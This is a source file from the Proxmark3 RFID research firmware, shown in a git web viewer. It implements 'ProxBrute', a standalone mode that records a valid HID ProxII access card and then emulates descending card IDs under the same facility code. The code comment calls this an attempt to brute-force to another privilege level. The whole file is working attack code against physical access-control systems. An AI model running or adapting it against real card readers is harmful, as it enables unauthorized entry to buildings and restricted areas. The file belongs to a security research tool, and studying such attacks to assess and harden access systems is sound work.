search:
summary | log | graphiclog1 | graphiclog2 | commit | commitdiff | tree | refs | edit | fork
blame | history | raw | HEAD
Merge pull request #2747 from Eltrick/stylise-dormakaba
[RRG-proxmark3.git] / armsrc / Standalone / lf_proxbrute.c
blob112693077b53f5d21ae38ba7dacf48a854d014b0
1 //-----------------------------------------------------------------------------
2 // Copyright (C) Brad Antoniewicz 2011
3 // Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
4 //
5 // This program is free software: you can redistribute it and/or modify
6 // it under the terms of the GNU General Public License as published by
7 // the Free Software Foundation, either version 3 of the License, or
8 // (at your option) any later version.
9 //
10 // This program is distributed in the hope that it will be useful,
11 // but WITHOUT ANY WARRANTY; without even the implied warranty of
12 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 // GNU General Public License for more details.
14 //
15 // See LICENSE.txt for the text of the license.
16 //-----------------------------------------------------------------------------
17 // main code for LF aka Proxbrute by Brad antoniewicz
18 //-----------------------------------------------------------------------------
19 #include "standalone.h" // standalone definitions
20 #include "proxmark3_arm.h"
21 #include "appmain.h"
22 #include "fpgaloader.h"
23 #include "util.h"
24 #include "dbprint.h"
25 #include "ticks.h"
26 #include "lfops.h"
27
28 void ModInfo(void) {
29 DbpString(" LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)");
30 }
31
32 // samy's sniff and repeat routine for LF
33 void RunMod(void) {
34 StandAloneMode();
35 Dbprintf(">> LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<");
36 FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
37
38 uint32_t high, low;
39
40 #define STATE_READ 0
41 #define STATE_BRUTE 1
42
43 uint8_t state = STATE_READ;
44
45 for (;;) {
46
47 WDT_HIT();
48
49 // exit from SamyRun, send a usbcommand.
50 if (data_available()) break;
51
52 // Was our button held down or pressed?
53 int button_pressed = BUTTON_HELD(280);
54 if (button_pressed != BUTTON_HOLD)
55 continue;
56
57 // Button was held for a second, begin recording
58 if (state == STATE_READ) {
59
60 LEDsoff();
61 LED_A_ON();
62 WAIT_BUTTON_RELEASED();
63
64 DbpString("[=] starting recording");
65
66 // findone, high, low
67 lf_hid_watch(1, &high, &low, true);
68
69 Dbprintf("[=] recorded | %x%08x", high, low);
70
71 // got nothing. blink and loop.
72 if (high == 0 && low == 0) {
73 SpinErr(LED_A, 100, 12);
74 DbpString("[=] only got zeros, retry recording after click");
75 continue;
76 }
77
78 SpinErr(LED_A, 250, 2);
79 state = STATE_BRUTE;
80 continue;
81
82 } else if (state == STATE_BRUTE) {
83
84 LED_C_ON(); // Simulate
85 WAIT_BUTTON_RELEASED();
86
87
88 /*
89 ProxBrute - brad a. - foundstone
90
91 Following code is a trivial brute forcer once you read a valid tag
92 the idea is you get a valid tag, then just try and brute force to
93 another priv level. The problem is that it has no idea if the code
94 worked or not, so its a crap shoot. One option is to time how long
95 it takes to get a valid ID then start from scratch every time.
96 */
97 DbpString("[=] entering ProxBrute mode");
98 Dbprintf("[=] simulating | %08x%08x", high, low);
99
100 for (uint16_t i = low - 1; i > 0; i--) {
101
102 if (data_available()) break;
103
104 // Was our button held down or pressed?
105 button_pressed = BUTTON_HELD(280);
106 if (button_pressed != BUTTON_HOLD) break;
107
108 Dbprintf("[=] trying Facility = %08x ID %08x", high, i);
109
110 // high, i, ledcontrol, timelimit 20000
111 CmdHIDsimTAGEx(0, high, i, 0, false, 20000);
112
113 SpinDelay(100);
114 }
115
116 state = STATE_READ;
117 SpinErr((LED_A | LED_C), 250, 2);
118 LEDsoff();
119 }
120 }
121
122 SpinErr((LED_A | LED_B | LED_C | LED_D), 250, 5);
123 DbpString("[=] You can take the shell back :) ...");
124 LEDsoff();
125 }
Proxmark3 - the RFID research Swiss army knife. Iceman firmware